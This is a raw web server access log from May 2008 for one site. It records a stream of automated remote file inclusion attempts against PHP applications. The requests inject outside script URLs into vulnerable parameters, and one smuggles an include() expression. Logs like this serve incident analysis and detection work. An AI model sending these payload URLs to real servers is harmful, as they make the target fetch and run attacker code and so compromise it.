89.107.66.224 - - [05/May/2008:12:00:25 -0700] "GET /logs/errors.php?error=http://subastas.viajes-abaco.com/uploaded/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [05/May/2008:12:00:26 -0700] "GET /errors.php?error=http://subastas.viajes-abaco.com/uploaded/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:12:01:17 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:12:01:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:01:27 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:12:01:27 -0700] "GET /logs/access_071224.log/admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:12:01:28 -0700] "GET /admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:01:56 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:01:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:01:58 -0700] "GET /htmltonuke.php?filnavn=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:02:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:02:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:02:54 -0700] "GET /logs/home.php?content=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:02:55 -0700] "GET /home.php?content=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:03:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:03:42 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:03:42 -0700] "GET /errors.php?error=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:04:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:04:09 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:12:04:15 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:12:04:16 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:12:04:22 -0700] "GET /logs/access_080215.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:04:46 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:04:47 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:12:04:47 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:12:04:51 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:12:05:03 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:12:05:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:12:05:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:05:11 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:05:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:05:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:05:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:05:52 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:12:05:55 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:12:05:55 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:06:24 -0700] "GET /logs/access_080111.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:06:38 -0700] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:06:45 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:06:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:07:09 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:07:10 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:07:19 -0700] "GET /logs/mosConfig_absolute_path=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:07:19 -0700] "GET /mosConfig_absolute_path=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:07:54 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:07:54 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:07:55 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:12:07:57 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:12:07:57 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:07:59 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:08:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:08:52 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:12:08:58 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:08:58 -0700] "GET /logs/index1.php?page=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:08:59 -0700] "GET /index1.php?page=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:09:26 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:09:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cdpm3.com/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:09:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:09:34 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:09:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:12:09:41 -0700] "GET /logs/access_080204.log/index.php?ir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:12:09:48 -0700] "GET /logs/index.php?ir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:12:09:49 -0700] "GET /index.php?ir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:12:10:24 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.35.179 - - [05/May/2008:12:12:07 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
210.203.73.105 - - [05/May/2008:12:12:13 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [05/May/2008:12:12:17 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [05/May/2008:12:12:17 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.138.13 - - [05/May/2008:12:12:21 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.17.138.13 - - [05/May/2008:12:12:21 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
210.203.73.105 - - [05/May/2008:12:12:24 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:12:39 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:12:39 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:12:48 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:12:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:12:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:12:13:14 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:14:02 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:14:10 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:14:19 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:14:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:14:26 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:14:46 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.13.128 - - [05/May/2008:12:14:55 -0700] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:12:15:01 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:12:15:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:15:25 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:16:12 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:16:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:16:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:12:16:36 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:16:49 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
96.52.36.19 - - [05/May/2008:12:16:50 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
85.25.145.85 - - [05/May/2008:12:16:54 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:16:54 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:17:35 -0700] "GET /logs/access_080111.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:17:56 -0700] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:18:12 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.86.32.149 - - [05/May/2008:12:18:14 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.warezscript.net/cache/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:12:18:19 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:12:18:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:12:18:20 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
71.86.32.149 - - [05/May/2008:12:18:23 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.warezscript.net/cache/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.115.68.51 - - [05/May/2008:12:19:18 -0700] "GET /start.php?s=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:12:19:23 -0700] "GET /logs/index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:12:19:24 -0700] "GET /index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:19:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:19:25 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:12:19:45 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:19:50 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.169 - - [05/May/2008:12:20:23 -0700] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:12:20:43 -0700] "GET /logs/index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:12:20:47 -0700] "GET /index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.251.34 - - [05/May/2008:12:20:51 -0700] "GET /logs/index.php?ort=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.251.34 - - [05/May/2008:12:20:55 -0700] "GET /index.php?ort=http://www.antares.net/borda2.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:21:05 -0700] "GET /logs/index.php?ir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
